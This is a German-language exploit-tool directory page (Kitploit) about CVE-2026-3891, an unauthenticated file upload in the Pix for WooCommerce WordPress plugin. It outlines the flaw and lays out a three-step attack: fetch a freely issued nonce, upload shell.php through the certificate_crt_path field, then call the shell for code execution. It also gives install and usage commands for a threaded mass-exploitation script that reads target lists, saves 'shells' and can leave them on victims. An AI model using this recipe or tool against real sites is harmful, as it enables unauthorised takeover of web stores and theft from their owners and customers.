Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-3891 — Pix für WooCommerce Nicht authentifizierter Datei-Upload über certificate_crt_path Parameter | CVSS 9.8 | Kitploit
Tools/GitHubGitHub/shinthink/cve-2026-3891
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubshinthink/cve-2026-3891

CVE-2026-3891

Pix für WooCommerce Nicht authentifizierter Datei-Upload über certificate_crt_path Parameter | CVSS 9.8

Repository anzeigen
41vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-3891 — Nicht authentifizierter Datei-Upload RCE in Pix for WooCommerce

Nonce-Leck → certificate_crt_path-Upload → Code-Ausführung


Übersicht

CVE-2026-3891 ist eine kritische (CVSS 9.8) nicht authentifizierte Schwachstelle für beliebige Datei-Uploads im Pix for WooCommerce WordPress-Plugin (von linknacional) in den Versionen ≤ 1.5.0.

Der AJAX-Handler lkn_pix_for_woocommerce_c6_save_settings hat:

  1. Keine Berechtigungsprüfung — jeder nicht authentifizierte Besucher kann ihn aufrufen
  2. Keine Dateityp-Validierung — jede Dateiendung wird über den Parameter certificate_crt_path akzeptiert
  3. Ein gültiger Nonce ist über den Endpunkt lkn_pix_for_woocommerce_generate_nonce frei erhältlich ohne Authentifizierung

Hochgeladene Dateien landen im webzugänglichen Verzeichnis /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/.

Betroffene Versionen

VersionStatus
≤ 1.5.0Verwundbar
1.6.0+Behoben

Entdeckt von: Alexis Lafontaine über Wordfence (13. März 2026)


Schwachstellenmechanismus

Grundursache

root@kitploit:~
// Nonce generated without auth
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);

// Upload handler — no capability check, no file type validation
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', ...);
function c6_save_settings() {
    // No current_user_can() check
    // No wp_check_filetype() call
    move_uploaded_file($_FILES['certificate_crt_path']['tmp_name'], $dest);
}

Angriffsablauf

root@kitploit:~
1. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_generate_nonce
   → Get valid nonce (no auth needed)
2. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_c6_save_settings
   → Upload shell.php via certificate_crt_path field
3. GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php
   → RCE

Installation

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-3891.git
cd CVE-2026-3891
pip install -r requirements.txt

Verwendung

root@kitploit:~
python cve_2026_3891.py -t target.com
python cve_2026_3891.py -f targets.txt -o shells.txt
python cve_2026_3891.py -t target.com --debug --no-cleanup

Argumente

root@kitploit:~
  -t, --target      Einzelnes Ziel
  -f, --file        Zielliste
  -o, --output      RCE-URLs speichern
  --threads         Arbeiter (Standard: 30)
  --no-cleanup      Shells auf dem Ziel belassen
  --debug           Jede Anfrage anzeigen
  -v, --verbose     Ausführliche Ausgabe

Haftungsausschluss

NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE TESTS. Die Autoren übernehmen keine Haftung für Missbrauch.


Referenzen

ResourceLink
Wordfence-Hinweiswordfence.com
NVD-EintragCVE-2026-3891
ForscherAlexis Lafontaine

Nicht verbunden mit linknacional oder Pix for WooCommerce.

Tool herunterladen